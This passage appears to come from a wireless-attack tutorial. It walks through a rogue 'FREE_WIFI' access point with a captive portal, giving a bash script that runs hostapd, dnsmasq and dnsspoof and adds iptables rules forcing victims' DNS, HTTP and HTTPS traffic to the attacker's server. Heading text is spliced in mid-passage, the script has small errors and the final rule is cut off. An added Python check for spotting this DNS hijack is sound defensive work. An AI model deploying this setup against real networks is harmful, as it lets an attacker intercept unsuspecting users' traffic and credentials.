
we want. However, it still has a number of weaknesses. For one thing, wireless devices that connect to our rogue access point may choose to ignore the DHCP Option, selecting a nameserver manually instead. To prevent this from occurring, we can simply redirect any DNS traffic to our DNS server using iptables.

Another problem with our current approach is that it does not account for the fact that most operating systems use a DNS cache to avoid having to make DNS lookups repeatedly. The domain names of the victim's most frequently visited websites are likely to be in this cache. This means that our captive portal will fail in most situations until each of the entries in the cache expires. Additionally, our current approach will fail to capture HTTP requests that do not make use of DNS. To deal with these issues, we can simply redirect all HTTP traffic to our own HTTP server.

We can incorporate these techniques into a bash script similar to the one we wrote in Wireless Man-In-The-Middle Attacks. Notice how we start Apache2 to serve content from /var/www/html.

    echo '10.0.0.1' > dnsspoof.conf
    dnsspoof -i wlan0 -f ./dnsspoof.conf
    iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53
    iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 80
    iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 443
Advanced Wireless Attacks Against Enterprise Networks
Firewall And NAC Evasion Using Indirect Wireless Pivots

    phy=wlan0
    channel=1
    bssid=00:11:22:33:44:00
    essid=FREE_WIFI

    # kill interfering processes
    service network-manager stop
    nmcli radio wifi off
    rfkill unblock wlan
    ifconfig wlan0 up

    echo "interface=$phy" > hostapd.conf
    echo "driver=nl80211" >> hostapd.conf
    echo "ssid=$essid" >> hostapd.conf
    echo "bssid=$bssid" >> hostapd.conf
    echo "channel=$channel" >> hostapd.conf
    echo "hw_mode=g" >> hostapd.conf
    hostapd ./hostapd

    ifconfig $phy 10.0.0.1 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

    echo "# define DHCP pool" > dnsmasq.conf
    echo "dhcp-range=10.0.0.80,10.0.0.254,6h" >> dnsmasq.conf
    echo "" >> dnsmasq.conf
    echo "# set phy as nameserver" >> dnsmasq.conf
    echo "dhcp-option=6,10.0.0.1" >> dnsmasq.conf
    echo "" >> dnsmasq.conf
    echo "# set rogue AP as Gateway" >> dnsmasq.conf
    echo "dhcp-option=3,10.0.0.1 #Gateway" >> dnsmasq.conf
    echo "" >> dnsmasq.conf
    echo "dhcp-authoritative" >> dnsmasq.conf
    echo "log-queries" >> dnsmasq.conf
    dnsmasq -C ./dnsmasq.conf &

    echo '10.0.0.1' > dnsspoof.conf
    dnsspoof -i $phy -f ./dnsspoof.conf

    systemctl start apache2

    echo '1' > /proc/sys/net/ipv4/ip_forward

    iptables --policy INPUT ACCEPT
    iptables --policy FORWARD ACCEPT
    iptables --policy OUTPUT ACCEPT
    iptables --flush
    iptables --table nat --flush
    iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE
    iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT
    iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53
    iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 80
    iptables --table nat --append PREROUTING --protocol tcp --destination-port
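Seen from a client, the DNS handling described above leaves a recognizable pattern: every name resolves to 10.0.0.1, which is also the gateway, and a manually configured nameserver returns the same answer because port 53 traffic is redirected. The Python check below is an added example for detecting that pattern, not code from the original paper; the function names, the threshold and the sample observations are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def base_domain(qname):
    # Crude assumption: the last two labels identify the site (ignores suffixes like co.uk).
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])

def detect_dns_hijack(observations, gateway, min_sites=3):
    """observations: (resolver_ip, qname, answer_ip) tuples recorded by one client."""
    sites, resolvers = defaultdict(set), defaultdict(set)
    for resolver, qname, answer in observations:
        sites[answer].add(base_domain(qname))
        resolvers[answer].add(resolver)
    findings = []
    for answer, names in sites.items():
        if len(names) < min_sites:
            continue  # one address serving a couple of names is normal
        ip = ipaddress.ip_address(answer)
        reasons = []
        if any(ip in net for net in RFC1918):
            reasons.append("unrelated sites resolve to one RFC 1918 address")
        if answer == gateway:
            reasons.append("answer is the default gateway")
        if len(resolvers[answer]) > 1:
            reasons.append("different resolvers returned the identical answer")
        if reasons:
            findings.append({"answer": answer, "sites": sorted(names), "reasons": reasons})
    return findings

# Constructed sample: a client on the 10.0.0.0/24 network from the script above,
# including lookups sent to manually configured public resolvers.
HIJACKED = [
    ("10.0.0.1", "www.example.com", "10.0.0.1"),
    ("8.8.8.8", "mail.example.org", "10.0.0.1"),
    ("1.1.1.1", "example.net", "10.0.0.1"),
]
# Constructed sample: ordinary network where three sites share one public address.
CLEAN = [
    ("192.168.1.1", "www.example.com", "203.0.113.10"),
    ("192.168.1.1", "www.example.org", "203.0.113.10"),
    ("192.168.1.1", "www.example.net", "203.0.113.10"),
    ("192.168.1.1", "intranet.example.com", "192.168.1.20"),
]

if __name__ == "__main__":
    for f in detect_dns_hijack(HIJACKED, gateway="10.0.0.1"):
        print(f["answer"], f["sites"], f["reasons"])
```

Because the page's rules also redirect ports 80 and 443, a DNS-only check should be paired with TLS certificate validation on the client, which the redirect cannot satisfy for sites the client already knows.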
  • Wi-Fi, Wireless access point, Gabriel Ryan
